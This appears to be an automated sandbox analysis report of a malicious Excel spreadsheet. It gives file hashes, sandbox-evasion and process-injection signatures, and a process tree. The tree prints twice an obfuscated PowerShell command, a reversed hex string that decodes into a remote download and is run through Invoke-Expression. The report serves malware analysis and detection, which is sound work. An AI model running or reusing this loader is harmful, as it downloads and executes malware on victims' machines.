Analysis
-
max time kernel
133s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
25/03/2025, 06:26
Behavioral task
behavioral1
Sample
96bf0039c8086e96b175fc8c5d09bd6ebb70c40a7f3a00293eebe287da4ecc8c.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
96bf0039c8086e96b175fc8c5d09bd6ebb70c40a7f3a00293eebe287da4ecc8c.xls
Resource
win10v2004-20250314-en
General
-
Target
96bf0039c8086e96b175fc8c5d09bd6ebb70c40a7f3a00293eebe287da4ecc8c.xls
-
Size
440KB
-
MD5
06278f61fb1e92e3f197930234fa6eb8
-
SHA1
34b83031b8bcbfeb820fa65a09f6e480a4f430b0
-
SHA256
96bf0039c8086e96b175fc8c5d09bd6ebb70c40a7f3a00293eebe287da4ecc8c
-
SHA512
ffaa4f467e3b1669ad589342cede512cedd727c78ea70fe366c2b42482260db0dd54bce99471fb52c422f7795c3b7361e7ce5b754b6507debbaf1d6625120556
-
SSDEEP
6144:Qk3hOdsylKlgxopeiBNhZF+E+W2kdAsoCbk1cVVXVKJKYWX36lvpxtZcEfz0/B9D:FhZh3cpFL0/WuYzqD0VlU9Z
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2096 5056 CMD.exe 86 -
Blocklisted process makes network request 1 IoCs
flow pid Process 26 1344 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1344 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3092 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1344 powershell.exe 1344 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1344 powershell.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 3092 EXCEL.EXE 3092 EXCEL.EXE 3092 EXCEL.EXE 3092 EXCEL.EXE 3092 EXCEL.EXE 3092 EXCEL.EXE 3092 EXCEL.EXE 3092 EXCEL.EXE 3092 EXCEL.EXE 3092 EXCEL.EXE 3092 EXCEL.EXE 3092 EXCEL.EXE 3092 EXCEL.EXE 3092 EXCEL.EXE -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 2096 wrote to memory of 1344 2096 CMD.exe 92 PID 2096 wrote to memory of 1344 2096 CMD.exe 92
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\96bf0039c8086e96b175fc8c5d09bd6ebb70c40a7f3a00293eebe287da4ecc8c.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3092
-
C:\Windows\system32\CMD.exeCMD /c start /min Powershell -WindowStyle hidden -command "$gh47gh7='92^72^37^26^67^E2^C6^C6^16^77^56^27^96^66^C5^72^02^B2^14^45^14^44^05^05^14^A3^67^E6^56^42^82^37^37^56^36^F6^27^07^D2^47^27^16^47^37^B3^85^06^54^06^94^C7^72^92^72^72^37^26^67^E2^C6^C6^16^77^56^27^96^66^C5^72^72^B2^14^45^14^44^05^05^14^A3^67^E6^56^42^C2^72^72^37^26^67^E2^96^46^56^F2^47^96^D6^56^27^F2^76^F6^C6^F2^D6^F6^36^E2^27^96^16^47^37^57^76^57^16^F2^F2^A3^07^47^47^86^72^72^82^56^72^B2^72^C6^96^72^B2^72^64^72^B2^72^46^72^B2^72^16^F6^72^B2^72^C6^E6^72^B2^72^77^F6^72^B2^72^44^E2^72^B2^72^92^47^E6^56^72^B2^72^96^C6^72^B2^72^34^72^B2^72^26^56^72^B2^72^75^72^B2^72^E2^47^72^B2^72^56^E4^72^02^B2^72^02^47^36^72^B2^72^56^A6^72^B2^72^26^F4^72^B2^72^D2^77^72^B2^72^56^E4^82^72';$r7gf0eee = $gh47gh7.ToCharArray();[Array]::Reverse($r7gf0eee);$uy4wer0=-join $r7gf0eee;$y45jkh0dfg=$uy4wer0.Split('^') | forEach {[char]([convert]::toint16($_,16))};$y45jkh0dfg -join ''|I`E`X"1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -WindowStyle hidden -command "$gh47gh7='92^72^37^26^67^E2^C6^C6^16^77^56^27^96^66^C5^72^02^B2^14^45^14^44^05^05^14^A3^67^E6^56^42^82^37^37^56^36^F6^27^07^D2^47^27^16^47^37^B3^85^06^54^06^94^C7^72^92^72^72^37^26^67^E2^C6^C6^16^77^56^27^96^66^C5^72^72^B2^14^45^14^44^05^05^14^A3^67^E6^56^42^C2^72^72^37^26^67^E2^96^46^56^F2^47^96^D6^56^27^F2^76^F6^C6^F2^D6^F6^36^E2^27^96^16^47^37^57^76^57^16^F2^F2^A3^07^47^47^86^72^72^82^56^72^B2^72^C6^96^72^B2^72^64^72^B2^72^46^72^B2^72^16^F6^72^B2^72^C6^E6^72^B2^72^77^F6^72^B2^72^44^E2^72^B2^72^92^47^E6^56^72^B2^72^96^C6^72^B2^72^34^72^B2^72^26^56^72^B2^72^75^72^B2^72^E2^47^72^B2^72^56^E4^72^02^B2^72^02^47^36^72^B2^72^56^A6^72^B2^72^26^F4^72^B2^72^D2^77^72^B2^72^56^E4^82^72';$r7gf0eee = $gh47gh7.ToCharArray();[Array]::Reverse($r7gf0eee);$uy4wer0=-join $r7gf0eee;$y45jkh0dfg=$uy4wer0.Split('^') | forEach {[char]([convert]::toint16($_,16))};$y45jkh0dfg -join ''|I`E`X"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1344
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize3KB
MD5d728ededc1da873eaa8eb9fe7560b843
SHA1242aafc70433f64554a29b38d70cf2576a79fac6
SHA25659814a65e9c611be0954fdc44fa3bb4153e4128e25014a74f38636144271fc95
SHA512ff49be25953e8f30d20a79402eb656f5ea3c9abd815e92bd508eb9eb1b9e78bb2f6fe68f211e7c1c871d9437990755dcd132866bb6f130288fbc7d2b29210125